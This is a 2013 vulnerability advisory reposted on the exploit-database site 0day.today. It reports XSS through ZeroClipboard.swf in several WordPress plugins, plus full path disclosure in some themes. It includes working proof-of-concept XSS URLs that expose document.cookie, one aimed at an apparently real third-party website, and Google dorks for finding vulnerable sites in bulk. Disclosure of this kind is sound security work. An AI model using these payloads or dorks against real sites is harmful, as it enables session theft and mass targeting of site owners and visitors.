0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ZeroClipboard Wordpress plugin XSS / FPD Vulnerabilities
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
These are Cross-Site Scripting vulnerabilities in multiple plugins for WordPress (with ZeroClipboard.swf).
Earlier I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote that this is very widespread flash-file and it's placed at tens of thousands of web sites. And it's used in hundreds of web applications.
After publishing this and two other advisories related to ZeroClipboard in February, I've published last month two new advisories (which I prepared in February). About vulnerabilities in WP plugins and in WP themes (with ZeroClipboard.swf).
This flash-file is used potentially in hundreds of plugins for WordPress. Among them are Flash Gallery, Slidedeck2, WPClone, PayPal Digital Goods powered by Cleeng and Cleeng Content Monetization. And there are many other vulnerable plugins for WP with ZeroClipboard.
After February's publications I've made a pause, and meanwhile Henri Salo disclosed in Match multiple vulnerable WordPress plugins with this flash-file (http://seclists.org/oss-sec/2013/q1/613). This list contains many plugins, but this is not exhaustive list and I've found many other vulnerable plugins with ZeroClipboard (including those, which I mentioned bellow).
SecurityVulns ID: 12910
CVE: CVE-2013-1808
-------------------------
Affected products:
-------------------------
Vulnerable are the next web applications (WordPress plugins) with ZeroClipboard (checked in mentioned versions):
Flash Gallery 1.7.2, Slidedeck2 (all Lite, Personal and Pro versions, fixed in version 2.1.20130306), WPClone 2.0.6, PayPal Digital Goods powered by Cleeng 2.2.4, Cleeng Content Monetization 2.3.2.
Both XSS vulnerabilities in ZeroClipboard are fixed in the last version ZeroClipboard 1.1.7. All developers should update swf-file in their software. I wrote about developers who begun fixing these vulnerabilities in ZeroClipboard in their software (http://seclists.org/fulldisclosure/2013/Mar/207).
----------
Details:
----------
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into buffer (as described in previous advisory).
1 Flash Gallery:
http://site/wp-content/plugins/1-flash-gallery/swf/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
Slidedeck2 (all Lite, Personal and Pro versions):
The folder of the plugin can be called slidedeck2, slidedeck-2.0, slidedeck2-personal and slidedeck2-pro. It contains the files ZeroClipboard.swf and ZeroClipboard10.swf.
http://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
WPClone:
http://site/wp-content/plugins/wpclone/lib/js/ZeroClipboard.swf?i?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
PayPal Digital Goods powered by Cleeng:
http://site/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
Cleeng Content Monetization:
http://www.drchloecarmichael.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
This is very widespread flash-file (both versions), as you can find out via Google dorks. If at searching by standard Goolge dork it's possible to find tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then at searching for plugins for WordPress it's possible to find hundreds thousand of sites with these flash-files.
inurl:zeroclipboard.swf inurl:/wp-content/plugins/ - about 224000 (in February, now more)
zeroclipboard.swf inurl:/wp-content/plugins/ - about 338000 (in February, now more)
Full path disclosure (WASC-13):
All mentioned themes have FPD vulnerabilities in php-files (in index.php and others), which is typically for WP themes.
http://site/wp-content/themes/montezuma/
http://site/wp-content/themes/striking/
http://site/wp-content/themes/couponpress/
http://site/wp-content/themes/azolla/
http://site/wp-content/themes/black-and-white/
------------
Timeline:
------------
2013.02.19 - after contacting with old and new developers of ZeroClipboard, I disclosed vulnerabilities in ZeroClipboard to the lists.
2013.02 - in February I wrote two additional advisories about vulnerabilities in different web applications with ZeroClipboard to draw more attention to this issue concerned with hundreds of web applications.
2013.03.15 - disclosed vulnerabilities in multiple plugins for WordPress at my site (http://websecurity.com.ua/6382/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
# 0day.today [2024-12-26] #